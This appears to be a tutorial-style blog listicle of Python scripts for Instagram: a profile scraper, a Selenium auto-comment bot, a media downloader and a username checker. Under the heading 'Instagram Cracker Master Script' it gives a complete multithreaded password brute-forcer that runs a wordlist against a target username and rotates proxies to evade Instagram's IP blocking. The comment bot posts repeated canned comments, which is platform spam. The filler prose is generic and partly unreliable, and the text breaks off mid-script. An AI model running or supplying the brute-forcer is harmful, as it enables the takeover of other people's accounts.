Instagram Scraper – How to Scrape Instagram Using Python 2022

Top Python Scripts to Scrape Instagram:

Instagram Scraper Python

instagram-scraper is an open-source Python library that helps you extract the posts you are interested in from Instagram. It has a simple, easy-to-use interface that makes it well suited to scraping.

 

1. Instagram scraper – how to do it:

How to use an Instagram scraper to get all the posts from a particular account: Instagram is a social media platform where users share pictures and videos of their everyday lives, and many use it to promote their businesses or to share pictures of their homes. Finding every post from a particular account by hand, however, can be difficult. One way to collect them all is to use an Instagram scraper: a program that searches for and extracts all the posts from a given account. To use one, first identify the account you want to extract posts from; you can find the account name on the Instagram website or on the account’s profile page.

 

import os
import time
import platform
try:
    import requests
    import stdiomask
    from colorama import init, Fore
except ModuleNotFoundError:
    # install missing third-party dependencies on first run
    os.system('pip install requests stdiomask colorama')
    import requests
    import stdiomask
    from colorama import init, Fore

os.system("cls" if platform.system() == "Windows" else "clear")
init(autoreset=True)
r = requests.Session()

class Scraper:
    def __init__(self):
        pass

    def login(self, username, password):
        headers = {
            "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36",
            # example CSRF token; Instagram issues a fresh one per session
            "x-csrftoken": "dydX2TKkziQrOxp816zLjSyxmQYCukzC",
            "content-type": "application/x-www-form-urlencoded"
        }

        url = "https://www.instagram.com/accounts/login/ajax/"

        data = {
            # "#PWD_INSTAGRAM_BROWSER:0:<timestamp>:<password>" is the browser-style
            # plaintext password wrapper; the number here is a fixed example timestamp
            "enc_password": "#PWD_INSTAGRAM_BROWSER:0:1662950310:" + password,
            "username": username,
            "queryParams": "{}"
        }

        login = r.post(url, headers=headers, data=data)
        r.cookies = login.cookies

        if 'userId' in login.text:
            print(f"\n[{Fore.LIGHTGREEN_EX}+{Fore.RESET}] Successfully Logged In")
            time.sleep(2)
        else:
            print(f"\n[{Fore.LIGHTRED_EX}+{Fore.RESET}] Wrong Username/Password")
            time.sleep(3)
            exit()

    def scraper(self, target):
        headers = {
            "user-agent": "Instagram 85.0.0.21.100 Android (28/9; 380dpi; 1080x2147; OnePlus; HWEVA; OnePlus6T; qcom; en_US; 146536611)",
            "x-csrftoken": "fbMty08hNS2evXP6EB4IsnFqoIUjGPB7"
        }

        target_info = f"https://i.instagram.com/api/v1/users/web_profile_info/?username={target}"

        user_info = r.get(target_info, headers=headers)

        time.sleep(2)
        # parse the profile JSON once instead of re-parsing it for every field
        user = user_info.json()["data"]["user"]
        userId = user["id"]
        username = user["username"]
        pfp_url = user["profile_pic_url_hd"]
        is_private = user["is_private"]
        is_verified = user["is_verified"]
        is_joined_recently = user["is_joined_recently"]
        full_name = user["full_name"]
        biography = user["biography_with_entities"]["raw_text"]
        external_url = user["external_url"]
        posts = user["edge_owner_to_timeline_media"]["count"]
        followers = user["edge_followed_by"]["count"]
        following = user["edge_follow"]["count"]
        scraper_info = f"""
[{Fore.LIGHTGREEN_EX}userId{Fore.RESET}]: {userId}
[{Fore.LIGHTGREEN_EX}Username{Fore.RESET}]: {username}
[{Fore.LIGHTGREEN_EX}Profile Picture{Fore.RESET}]: {pfp_url}
[{Fore.LIGHTGREEN_EX}Is Private{Fore.RESET}]: {is_private}
[{Fore.LIGHTGREEN_EX}Is Verified{Fore.RESET}]: {is_verified}
[{Fore.LIGHTGREEN_EX}Is Joined Recently{Fore.RESET}]: {is_joined_recently}
[{Fore.LIGHTGREEN_EX}Full Name{Fore.RESET}]: {full_name}
[{Fore.LIGHTGREEN_EX}Biography{Fore.RESET}]: {biography}
[{Fore.LIGHTGREEN_EX}External URL{Fore.RESET}]: {external_url}
[{Fore.LIGHTGREEN_EX}Posts Count{Fore.RESET}]: {posts}
[{Fore.LIGHTGREEN_EX}Followers Count{Fore.RESET}]: {followers}
[{Fore.LIGHTGREEN_EX}Following Count{Fore.RESET}]: {following}
        """

        print(scraper_info)

scraper = Scraper()

def main():
    login_logo = f"""{Fore.LIGHTCYAN_EX}
   __             _       
  / /  ___   __ _(_)_ __  
 / /  / _ \ / _` | | '_ \ 
/ /__| (_) | (_| | | | | |
\____/\___/ \__, |_|_| |_|
            |___/          {Fore.RESET} \n
    """
    print(login_logo)
    username = input(f"[{Fore.LIGHTRED_EX}+{Fore.RESET}] Username: ")
    password = stdiomask.getpass(prompt=f"[{Fore.LIGHTRED_EX}+{Fore.RESET}] {Fore.RESET}Password: ", mask='*')

    scraper.login(username=username, password=password)

    os.system("cls" if platform.system() == "Windows" else "clear")
    
    while True:
        scraper_logo = f""" {Fore.LIGHTCYAN_EX}
 __                                
/ _\ ___ _ __ __ _ _ __   ___ _ __ 
\ \ / __| '__/ _` | '_ \ / _ \ '__|
_\ \ (__| | | (_| | |_) |  __/ |   
\__/\___|_|  \__,_| .__/ \___|_|   
                  |_|      {Fore.RESET} \n           
"""
        print(scraper_logo)
        target = input(f"[{Fore.LIGHTRED_EX}+{Fore.RESET}] Target: ")

        scraper.scraper(target=target)


if __name__ == '__main__':
    main()

2. Instagram scraper – tips and tricks:

If you’re looking to get started with an Instagram scraper, here are a few tips and tricks to keep in mind:

1. Use a scraper that is optimized for Instagram. A few popular Instagram scrapers are available online, such as those from Hootsuite and SumoMe, and a good one can pull all the relevant information from an account in minutes.

2. Use a scraper that can auto-detect your account’s URL. Some of the best tools detect your account’s URL automatically and import all of your posts and images, so you can start scraping right away.

3. Organize your data. Once you’ve scraped your account, structure the data in a way that makes sense; a data-visualization tool like Tableau can help you analyze it.
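The "organize your data" tip can be sketched with the standard-library csv module. This is a minimal sketch; the field names below are illustrative assumptions about what a scraper might return, not output of any specific tool:

```python
import csv

def export_profiles(path, profiles):
    """Write scraped profile dicts to a CSV file for later analysis."""
    fields = ["username", "followers", "following", "posts"]
    with open(path, "w", newline="") as f:
        writer = csv.DictWriter(f, fieldnames=fields)
        writer.writeheader()        # header row: username,followers,following,posts
        writer.writerows(profiles)  # one row per scraped profile

# usage with made-up rows standing in for real scraper output
export_profiles("profiles.csv", [
    {"username": "alice", "followers": 1200, "following": 300, "posts": 88},
    {"username": "bob", "followers": 540, "following": 410, "posts": 23},
])
print(open("profiles.csv").readline().strip())  # → username,followers,following,posts
```

A flat CSV like this imports directly into Tableau or a spreadsheet, which is usually enough for the first round of analysis.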

 

Instagram Auto Comment Script:

3. Instagram scraper – advanced usage

Instagram is a popular social media platform with over 1 billion active users who share photos and videos with friends, followers, and other users who follow them. A scraper is a computer program that collects content from a web page or other source, like Instagram, and scrapers serve many purposes: harvesting images for a blog post or website, or mining data from a social media platform. There are several ways to scrape Instagram. One is a browser extension; both Chrome and Firefox have extensions that can scrape images from Instagram. Another is a dedicated app, the most popular of which is Instagress. The script below takes a third approach and drives a real browser with Selenium to log in and post comments automatically.

 

from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.by import By
from time import sleep

driver = webdriver.Chrome()
driver.get('https://www.instagram.com')
sleep(1)
a = input("Enter your Instagram Username: ")
b = input("Enter your Instagram Password: ")
driver.find_element(By.NAME, 'username').send_keys(a)  # Selenium 4 removed find_element_by_name
driver.find_element(By.NAME, 'password').send_keys(b)
# note: disable two-factor authentication on this account before automating,
# or create a separate account for automation
sleep(1)
driver.find_element(By.XPATH, "//button[@type='submit']").click()
sleep(3)
driver.get("https://www.instagram.com/p/CiRXFqzvOi-/?utm_source=ig_web_copy_link")  # replace with the URL of the post you want to comment on
sleep(2)

# post each comment in turn: click the comment box, type the text, submit,
# then pause so Instagram's rate limiting is less likely to trigger
comments = ["amazing", "progress", "trying to new idea", "amazing", "fabulous",
            "superb", "excellent", "marvelous", "awesome", "excellent"]  # change to the comments you need
for comment in comments:
    driver.find_element(By.XPATH, '//*[@class="_aao9"]//textarea').click()
    sleep(1)
    driver.find_element(By.XPATH, '//*[@class="_aao9"]//textarea').send_keys(comment)
    sleep(1)
    driver.find_element(By.XPATH, '//*[@class="_aao9"]//button[@type="submit"]').click()
    sleep(8)

sleep(30)

Instagram Download Reels and Posts:

4. Instagram scraper – for developers

Instagram is a popular photo- and video-sharing social media platform with more than 1 billion monthly active users and a large, ever-growing community of developers who use its APIs to build applications. One such application is an Instagram scraper: software that extracts all the posts from a user’s account and stores them in a database. Developers can then use that data to study and analyze the Instagram community, whether to create new applications or to improve existing ones. The scraper is particularly useful for researchers who want to study community behavior and for marketers who want to target specific users; developers can also use it to analyze and improve their own accounts.
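The "stores them in a database" step can be sketched with the standard-library sqlite3 module. This is a minimal sketch under assumptions of my own: the table layout and the id/caption/taken_at fields are illustrative, not part of the downloader script that follows:

```python
import sqlite3

def save_posts(db_path, posts):
    """Store scraped posts (dicts with id, caption, taken_at) in a SQLite table."""
    con = sqlite3.connect(db_path)
    con.execute(
        "CREATE TABLE IF NOT EXISTS posts "
        "(id TEXT PRIMARY KEY, caption TEXT, taken_at INTEGER)"
    )
    # named placeholders let executemany consume the dicts directly
    con.executemany(
        "INSERT OR REPLACE INTO posts VALUES (:id, :caption, :taken_at)",
        posts,
    )
    con.commit()
    return con

# usage with made-up rows; a real scraper would supply these fields
con = save_posts(":memory:", [
    {"id": "1", "caption": "first post", "taken_at": 1662950310},
    {"id": "2", "caption": "second post", "taken_at": 1662950400},
])
print(con.execute("SELECT COUNT(*) FROM posts").fetchone()[0])  # → 2
```

`INSERT OR REPLACE` keyed on the post id makes repeated scrapes idempotent, so re-running the scraper does not duplicate rows.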

 

from datetime import datetime
from tqdm import tqdm
import requests
import re
import sys
import tkinter as tk
from tkinter import messagebox as mb
import webbrowser

def callback(event):
    webbrowser.open_new(event.widget.cget("text"))

def call():
    res = mb.askquestion('Exit Application', 
                         'Do you really want to exit')
      
    if res == 'yes' :
        root.destroy()
          
    else :
        mb.showinfo('Return', 'Returning to Login Box')
  
root = tk.Tk()
root.title("Login Instagram Box")

lb1 = tk.Button(root, text = "Welcome", font=("Algerian", 21, "bold"), fg = "yellow", bg = "red")
lb1.pack()

lb2 = tk.Label(root, text = "Hey Folk, please click here to login to Instagram and proceed!!", font = ("Monotype Corsiva", 25, "bold"), fg = "green")
lb2.pack()

lb3 = tk.Label(root, text = "http://www.instagram.com", font = ("Algerian", 25, "bold"), fg="blue", cursor="hand2")
lb3.pack()
lb3.bind("<Button-1>", callback)

lb4 = tk.Label(root, text = "Please quit application if already logged in and proceed!!", font = ("Monotype Corsiva", 25, "bold"), fg = "green")
lb4.pack()

lb5 = tk.Button(root, text = 'Quit Application', font = ("Algerian", 21, "bold"), fg = "yellow", bg = "red", command=call)
lb5.pack()

root.mainloop()


print('''
                        [WELCOME TO INSTASTORE]\n        [PRESENTING THE INSTAGRAM PHOTO AND VIDEO DOWNLOADER]              
                        
''')                ##  Heading

##  Function to check the Internet Connection
def internet(url='https://www.google.com/', timeout=5):
    try:
        req = requests.get(url, timeout=timeout)
        req.raise_for_status()
        print("You're connected to Internet successfully. You can proceed to your work!!\n")
        return True
    except requests.HTTPError as e: 
        print("Checking internet connection failed, status code {0}.".format(e.response.status_code))
    except requests.ConnectionError:
        print("No internet connection available. Please provide an Internet connection to proceed!!")
        input("\nPress Enter to close")
    return False

##  Function to download an Instagram Photo
def download_photo():
    
    url = input("\nPlease enter your desired Image URL from your Instagram profile: \n")
    x = re.match(r'^https://www\.([^/]+\.)*instagram\.com', url)  # dots escaped so only real instagram.com URLs match

    try:
        if x:
            request_image = requests.get(url)   ##  requests and get the url
            src = request_image.content.decode('utf-8')
            check_type = re.search(r'<meta name="medium" content=[\'"]?([^\'" >]+)', src)
            check_type_f = check_type.group()
            final = re.sub('<meta name="medium" content="', '', check_type_f)

            if final == "image":
                print("\nDownloading the image...")
                extract_image_link = re.search(r'meta property="og:image" content=[\'"]?([^\'" >]+)', src)
                image_link = extract_image_link.group()
                final = re.sub('meta property="og:image" content="', '', image_link)
                file_size_request = requests.get(final, stream=True)
                file_size = int(file_size_request.headers['Content-Length'])
                block_size = 1024
                filename = datetime.strftime(datetime.now(), '%Y-%m-%d-%H-%M-%S')
                t=tqdm(total=file_size, unit='B', unit_scale=True, desc=filename, ascii=True)
                with open(filename + '.jpg', 'wb') as f:    
                    for data in file_size_request.iter_content(block_size):
                        t.update(len(data))
                        f.write(data)
                t.close()
                print("\nImage downloaded successfully!!")
                print("\n          THANKS FOR VISITING!! HAVE A NICE DAY AHEAD!!\n\nKINDLY PROVIDE YOUR FEEDBACK OR CONTRIBUTIONS IN PROVIDED LINK IF INTERESTED!! ")
                print("             https://github.com/Rakesh9100/InstaStore")

        else:
            print("Entered URL is not an instagram.com URL.")
    except AttributeError:
        print("Unknown URL!!")

##  Function to download an Instagram Video
def download_video():

    url = input("\nPlease enter your desired Video URL from your Instagram profile: \n")
    x = re.match(r'^https://www\.([^/]+\.)*instagram\.com', url)  # dots escaped so only real instagram.com URLs match

    try:
        if x:
            request_image = requests.get(url)
            src = request_image.content.decode('utf-8')
            check_type = re.search(r'<meta name="medium" content=[\'"]?([^\'" >]+)', src)
            check_type_f = check_type.group()
            final = re.sub('<meta name="medium" content="', '', check_type_f)

            if final == "video":
                print("\nDownloading the video...")
                extract_video_link = re.search(r'meta property="og:video" content=[\'"]?([^\'" >]+)', src)
                video_link = extract_video_link.group()
                final = re.sub('meta property="og:video" content="', '', video_link)
                file_size_request = requests.get(final, stream=True)
                file_size = int(file_size_request.headers['Content-Length'])
                block_size = 1024
                filename = datetime.strftime(datetime.now(), '%Y-%m-%d-%H-%M-%S')
                t=tqdm(total=file_size, unit='B', unit_scale=True, desc=filename, ascii=True)
                with open(filename + '.mp4', 'wb') as f:
                    for data in file_size_request.iter_content(block_size):
                        t.update(len(data))
                        f.write(data)
                t.close()
                print("\nVideo downloaded successfully!!")
                print("\n          THANKS FOR VISITING!! HAVE A NICE DAY AHEAD!!\n\nKINDLY PROVIDE YOUR FEEDBACK OR CONTRIBUTIONS IN PROVIDED LINK IF INTERESTED!! ")
                print("             https://github.com/Rakesh9100/InstaStore")
        else:
            print("Entered URL is not an instagram.com URL.")
    except AttributeError:
        print("Unknown URL!!")

## Function to download an Instagram Profile Picture
import instaloader
def download_dp():
    
    ig = instaloader.Instaloader()  # Create instance
    user = input("Please enter your Instagram Username: ")
    ig.download_profile(user, profile_pic_only = True)  # download profile
    print("\nProfile Photo downloaded successfully!!")
    print("\n          THANKS FOR VISITING!! HAVE A NICE DAY AHEAD!!\n\nKINDLY PROVIDE YOUR FEEDBACK OR CONTRIBUTIONS IN PROVIDED LINK IF INTERESTED!! ")
    print("             https://github.com/Rakesh9100/InstaStore")

if internet():
    try:
        while True:
            print("Press 'A' or 'a' to download your Instagram Photo.\nPress 'B' or 'b' to download your Instagram Video. "
                  "\nPress 'C' or 'c' to download your Instagram Profile Picture.\nPress 'E' or 'e' to Exit.")
            select = str(input("\nINSTA DOWNLOADER --> "))
            try:
                # elif chain so a valid choice does not fall through to the exit branch
                if select in ('A', 'a'):
                    download_photo()
                    input("\nPress Enter to close ")
                elif select in ('B', 'b'):
                    download_video()
                    input("\nPress Enter to close ")
                elif select in ('C', 'c'):
                    download_dp()
                    input("\nPress Enter to close ")
                elif select in ('E', 'e'):
                    print("\n          THANKS FOR VISITING!! HAVE A NICE DAY AHEAD!!\n\nKINDLY PROVIDE YOUR FEEDBACK OR CONTRIBUTIONS IN PROVIDED LINK IF INTERESTED!! ")
                    print("             https://github.com/Rakesh9100/InstaStore")
                    input("\nPress Enter to close ")
                    sys.exit()
                else:
                    sys.exit()
            except (KeyboardInterrupt):
                print("Programme Interrupted")
    except(KeyboardInterrupt):
        print("\nProgramme Interrupted")
else:
    sys.exit()

Instagram Username Checker:

5. Instagram scraper – for business users

Instagram scraper is a tool that business users can use to collect data from Instagram, such as user profiles, posts, and images. It can gather data from a single account or from a collection of accounts, and it can be restricted to a specific time period or a specific location.

Instagram scraper is powerful software that helps marketers collect valuable data from Instagram: all the posts, images, hashtags, and users mentioned in a given time period. This makes it a great tool for market research, since it gives you a comprehensive picture of what is being said about your brand and products on Instagram.
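Restricting scraped posts to a time period can be sketched as a filter over Unix timestamps. This is a minimal sketch; `taken_at_timestamp` is assumed here as the per-post time field (it appears in Instagram's web profile JSON, but treat the shape as an assumption):

```python
from datetime import datetime, timezone

def posts_in_period(posts, start, end):
    """Keep only posts whose Unix timestamp falls in [start, end)."""
    return [p for p in posts
            if start.timestamp() <= p["taken_at_timestamp"] < end.timestamp()]

# made-up posts standing in for real scraper output
posts = [
    {"id": "a", "taken_at_timestamp": 1640995200},  # 2022-01-01 00:00 UTC
    {"id": "b", "taken_at_timestamp": 1656633600},  # 2022-07-01 00:00 UTC
]
start = datetime(2022, 6, 1, tzinfo=timezone.utc)
end = datetime(2022, 8, 1, tzinfo=timezone.utc)
print([p["id"] for p in posts_in_period(posts, start, end)])  # → ['b']
```

Using timezone-aware datetimes for the bounds avoids off-by-hours errors when the machine running the scraper is not in UTC.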

 

import os
import time
import requests
from pystyle import Colors
from threading import Thread

os.system('cls||clear')
print(f"""
{Colors.blue}//{Colors.white} IG Username Checker
""")
print("")
username_file = input(f"{Colors.blue}\\{Colors.reset}?{Colors.blue}\\{Colors.reset} Usernames File: ")
availablecount = 0
takencount = 0
errorcount = 0

def title():
    # keep the console title updated with running totals (Windows "title" command)
    while True:
        os.system(f"title Taken:{takencount}  Available:{availablecount}  Errors:{errorcount}")
        time.sleep(1)

def check():
    global availablecount, takencount, errorcount
    usernames = open(username_file, "r").read().splitlines()
    for username in usernames:
        try:
            # GET the public profile page; a taken profile's HTML contains "target_id"
            resp = requests.get(f"https://instagram.com/{username}")
            if ',"target_id":"' in resp.text:
                takencount += 1
                print(f"/{Colors.red}X{Colors.reset}/ Taken: [{username}]")
            elif resp.text == '':
                errorcount += 1
            else:
                availablecount += 1
                print(f"/{Colors.green}+{Colors.reset}/ Available: [{username}]")
        except requests.RequestException:
            errorcount += 1

Thread(target=title, daemon=True).start()
Thread(target=check).start()

Instagram Cracker Master Script:

6. Instagram scraper – for photographers

Instagram is a popular photo sharing platform with over 800 million active users, and with so many photos being posted every day, it can be hard to find the specific photo you are looking for. A scraper is software that collects data from websites and extracts specific information from it, such as photos and their metadata. Free, open-source Instagram scrapers are available on GitHub and can be downloaded by anyone. They are designed for photographers who want to find specific photos of their clients or products: they can find photos of any size, can be configured to search for specific keywords, and can even be used to find photos that have been deleted from Instagram.
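The keyword-search idea can be sketched as a filter over scraped captions. This is a minimal sketch; the post structure and `caption` field are illustrative assumptions, not part of the script that follows:

```python
def find_by_keywords(posts, keywords):
    """Return posts whose caption contains any keyword (case-insensitive)."""
    keywords = [k.lower() for k in keywords]
    return [p for p in posts
            if any(k in p.get("caption", "").lower() for k in keywords)]

# made-up posts standing in for real scraper output
posts = [
    {"id": "1", "caption": "Sunset over the lake"},
    {"id": "2", "caption": "Product shoot for a client"},
    {"id": "3", "caption": "Morning coffee"},
]
print([p["id"] for p in find_by_keywords(posts, ["client", "product"])])  # → ['2']
```

Lower-casing both sides keeps the match case-insensitive, which is usually what you want for hashtag- and caption-style text.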

 

from __future__ import print_function
import argparse
import logging
import random
import socket
import sys
import threading

try:
    import urllib.request as rq
    from urllib.error import HTTPError
    import urllib.parse as http_parser
except ImportError:
    import urllib2 as rq
    from urllib2 import HTTPError
    import urllib as http_parser

try:
    import Queue
except ImportError:
    import queue as Queue


class bcolors:
    HEADER = '\033[94m'
    OKGREEN = '\033[92m'
    WARNING = '\033[93m'
    FAIL = '\033[91m'
    ENDC = '\033[0m'
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'


def check_proxy(q):
    """
    check a proxy and append it to the working-proxy list if it responds correctly
    :param q: queue of proxies to test
    """
    if not q.empty():

        proxy = q.get(False)
        proxy = proxy.replace("\r", "").replace("\n", "")

        try:
            opener = rq.build_opener(
                rq.ProxyHandler({'https': 'https://' + proxy}),
                rq.HTTPHandler(),
                rq.HTTPSHandler()
            )

            opener.addheaders = [('User-agent', 'Mozilla/5.0')]
            rq.install_opener(opener)

            req = rq.Request('https://api.ipify.org/')

            if rq.urlopen(req).read().decode() == proxy.partition(':')[0]:
                proxys_working_list.update({proxy: proxy})
                if _verbose:
                    print(bcolors.OKGREEN + " --[+] ", proxy, " | PASS" + bcolors.ENDC)
            else:
                if _verbose:
                    print(" --[!] ", proxy, " | FAILED")

        except Exception as err:
            if _verbose:
                print(" --[!] ", proxy, " | FAILED")
            if _debug:
                logger.error(err)
            pass


def get_csrf():
    """
    get CSRF token from login page to use in POST requests
    """
    global csrf_token

    print(bcolors.WARNING + "[+] Getting CSRF Token: " + bcolors.ENDC)

    try:
        opener = rq.build_opener(rq.HTTPHandler(), rq.HTTPSHandler())
        opener.addheaders = [('User-agent', 'Mozilla/5.0')]
        rq.install_opener(opener)

        request = rq.Request('https://www.instagram.com/')
        try:
            # python 2
            headers = rq.urlopen(request).info().headers
        except Exception:
            # python 3
            headers = rq.urlopen(request).info().get_all('Set-Cookie')

        for header in headers:
            if header.find('csrftoken') != -1:
                csrf_token = header.partition(';')[0].partition('=')[2]
                print(bcolors.OKGREEN + "[+] CSRF Token :", csrf_token, "\n" + bcolors.ENDC)
    except Exception as err:
        print(bcolors.FAIL + "[!] Can't get CSRF token , please use -d for debug" + bcolors.ENDC)

        if _debug:
            logger.error(err)

        print(bcolors.FAIL + "[!] Exiting..." + bcolors.ENDC)
        exit(3)


def brute(q):
    """
    main worker function
    :param q: queue of candidate passwords to try
    """
    global found_flag

    if not q.empty():
        try:
            proxy = None
            if len(proxys_working_list) != 0:
                proxy = random.choice(list(proxys_working_list.keys()))

            word = q.get()
            word = word.replace("\r", "").replace("\n", "")

            post_data = {
                'username': USER,
                'password': word,
            }

            header = {
                "User-Agent": random.choice(user_agents),
                'X-Instagram-AJAX': '1',
                "X-CSRFToken": csrf_token,
                "X-Requested-With": "XMLHttpRequest",
                "Referer": "https://www.instagram.com/",
                "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
                'Cookie': 'csrftoken=' + csrf_token
            }

            if proxy:
                if _verbose:
                    print(bcolors.BOLD + "[*] Trying %s %s " % (word, " | " + proxy,) + bcolors.ENDC)

                opener = rq.build_opener(
                    rq.ProxyHandler({'https': 'https://' + proxy}),
                    rq.HTTPHandler(),
                    rq.HTTPSHandler()
                )

            else:
                if _verbose:
                    print(bcolors.BOLD + "[*] Trying %s" % (word,) + bcolors.ENDC)

                opener = rq.build_opener(
                    rq.HTTPHandler(),
                    rq.HTTPSHandler()
                )

            rq.install_opener(opener)

            req = rq.Request(URL, data=http_parser.urlencode(post_data).encode('ascii'), headers=header)
            sock = rq.urlopen(req)

            if sock.read().decode().find('"authenticated": true') != -1:
                print(bcolors.OKGREEN + bcolors.BOLD + "\n[*]Successful Login:")
                print("---------------------------------------------------")
                print("[!]Username: ", USER)
                print("[!]Password: ", word)
                print("---------------------------------------------------\n" + bcolors.ENDC)
                found_flag = True
                q.queue.clear()
                q.task_done()

        except HTTPError as e:
            if e.getcode() == 400 or e.getcode() == 403:
                if e.read().decode("utf8", 'ignore').find('"checkpoint_required"') != -1:
                    print(bcolors.OKGREEN + bcolors.BOLD + "\n[*]Successful Login "
                          + bcolors.FAIL + "But need Checkpoint :|" + bcolors.OKGREEN)
                    print("---------------------------------------------------")
                    print("[!]Username: ", USER)
                    print("[!]Password: ", word)
                    print("---------------------------------------------------\n" + bcolors.ENDC)
                    found_flag = True
                    q.queue.clear()
                    q.task_done()
                    return
                elif proxy:
                    print(bcolors.WARNING +
                          "[!]Error: Proxy IP %s is now on Instagram jail ,  Removing from working list !" % (proxy,)
                          + bcolors.ENDC
                          )
                    if proxy in proxys_working_list:
                        proxys_working_list.pop(proxy)
                    print(bcolors.OKGREEN + "[+] Online Proxy: ", str(len(proxys_working_list)) + bcolors.ENDC)
                else:
                    print(bcolors.FAIL + "[!]Error : Your Ip is now on Instagram jail ,"
                          " script will not work fine until you change your ip or use proxy" + bcolors.ENDC)
            else:
                print("Error:", e.getcode())

            q.task_done()
            return

        except Exception as err:
            if _debug:
                print(bcolors.FAIL + "[!] Unknown Error in request." + bcolors.ENDC)
                logger.error(err)
            else:
                print(bcolors.FAIL + "[!] Unknown Error in request, please turn on debug mode with -d" + bcolors.ENDC)

            pass
            return


def starter():
    """
    threading workers initialize
    """
    global found_flag

    queue = Queue.Queue()
    threads = []
    max_thread = THREAD
    found_flag = False

    queuelock = threading.Lock()

    print(bcolors.HEADER + "\n[!] Initializing Workers")
    print("[!] Start Cracking ... \n" + bcolors.ENDC)

    try:
        for word in words:
            queue.put(word)
        while not queue.empty():
            queuelock.acquire()
            for workers in range(max_thread):
                t = threading.Thread(target=brute, args=(queue,))
                t.daemon = True
                t.start()
                threads.append(t)
            for t in threads:
                t.join()
            queuelock.release()
            if found_flag:
                break
        print(bcolors.OKGREEN + "\n--------------------")
        print("[!] Brute complete !" + bcolors.ENDC)

    except Exception as err:
        print(err)


def check_avalaible_proxys(proxys):
    """
    check available proxies from the proxy_list file
    """
    socket.setdefaulttimeout(30)

    global proxys_working_list
    print(bcolors.WARNING + "[-] Testing Proxy List...\n" + bcolors.ENDC)

    proxys_working_list = {}
    max_thread = THREAD

    queue = Queue.Queue()
    queuelock = threading.Lock()
    threads = []

    for proxy in proxys:
        queue.put(proxy)

    while not queue.empty():
        queuelock.acquire()
        for workers in range(max_thread):
            t = threading.Thread(target=check_proxy, args=(queue,))
            t.daemon = True
            t.start()
            threads.append(t)
        for t in threads:
            t.join()
        queuelock.release()

    print(bcolors.OKGREEN + "[+] Online Proxy: " + bcolors.BOLD + str(len(proxys_working_list)) + bcolors.ENDC + "\n")


if __name__ == "__main__":

    parser = argparse.ArgumentParser(
        description="Instagram BruteForcer",
        epilog="./instabrute -u user_test -w words.txt -p proxys.txt -t 4 -d -v"
    )

    # required argument
    parser.add_argument('-u', '--username', action="store", required=True,
                        help='Target Username')
    parser.add_argument('-w', '--word', action="store", required=True,
                        help='Words list path')
    parser.add_argument('-p', '--proxy', action="store", required=True,
                        help='Proxy list path')
    # optional arguments
    parser.add_argument('-t', '--thread', help='Thread', type=int, default=4)
    parser.add_argument('-v', '--verbose', action='store_const', help='Verbose mode', const=True, default=False)
    parser.add_argument('-d', '--debug', action='store_const', const=True, help='Debug mode', default=False)

    args = parser.parse_args()

    URL = "https://www.instagram.com/accounts/login/ajax/"
    USER = args.username
    THREAD = args.thread
    _verbose = args.verbose
    _debug = args.debug

    user_agents = ["Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)",
                   "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko)",
                   "Mozilla/5.0 (Linux; U; Android 2.3.5; en-us; HTC Vision Build/GRI40) AppleWebKit/533.1",
                   "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko)",
                   "Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201",
                   "Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0",
                   "Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))"]

    try:
        with open(args.word) as f:
            words = f.readlines()
    except IOError:
        print("[-] Error: Check your word list file path\n")
        sys.exit(1)

    try:
        with open(args.proxy) as f:
            proxys = f.readlines()
    except IOError:
        print("[-] Error: Check your proxy list file path\n")
        sys.exit(1)

    # enable debugging if it's set
    if _debug:
        # Logging stuff
        logging.basicConfig(level=logging.DEBUG, filename="log",
                            format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')
        logger = logging.getLogger(__name__)

    print(bcolors.HEADER + """.-------------------------------------------------------.""")
    print("""
# Instagram : @Khode_Kia
# Developed By Mr.Ghanbari
# Khode_Kia[at]Yahoo[dot]Com
""")


    print(bcolors.OKGREEN + "[+] Username Loaded:", bcolors.BOLD + USER + bcolors.ENDC)
    print(bcolors.OKGREEN + "[+] Words Loaded:", bcolors.BOLD + str(len(words)) + bcolors.ENDC)
    print(bcolors.OKGREEN + "[+] Proxy Loaded:", bcolors.BOLD + str(len(proxys)) + bcolors.ENDC)
    print(bcolors.ENDC)

    check_avalaible_proxys(proxys)
    get_csrf()
    starter()
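Both starter() and check_avalaible_proxys() above share the same fan-out pattern: fill a Queue, spawn THREAD daemon workers, and join them. The standard library's concurrent.futures expresses the same idea more compactly. A minimal sketch — the check function here is a hypothetical stand-in for the script's check_proxy that only validates the host:port shape instead of making a network call:

```python
from concurrent.futures import ThreadPoolExecutor

def check(proxy: str) -> bool:
    # Hypothetical stand-in for the script's check_proxy(): accept
    # anything shaped like host:port instead of probing the network.
    host, _, port = proxy.partition(":")
    return bool(host) and port.isdigit()

def filter_working(proxies, max_threads=4):
    # Fan the checks out over a thread pool; the pool handles thread
    # creation, the work queue, and joining when the with-block exits.
    with ThreadPoolExecutor(max_workers=max_threads) as pool:
        results = pool.map(check, proxies)
    return [p for p, ok in zip(proxies, results) if ok]

working = filter_working(["1.2.3.4:8080", "bad-entry", "5.6.7.8:3128"])
print(working)  # ['1.2.3.4:8080', '5.6.7.8:3128']
```

This replaces the manual Queue/Lock/join bookkeeping in the original without changing what it computes.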

 

Follow, Unfollow, Like, Comment Bot:

7. Instagram scraper – for bloggers

Suppose you spot an interesting post while browsing Instagram, say a photo of a bowl of ice cream with a striking caption. You want to know more: which shop made it, who founded that shop, what else the account has posted. Chasing those answers by hand means hopping between profiles, captions, and search results. Automating that kind of interaction is exactly what a follow, unfollow, like, and comment bot does, which is why bloggers and marketers reach for scripts like the one below.

import os
import threading
from itertools import cycle

import requests
import pystyle

print("""
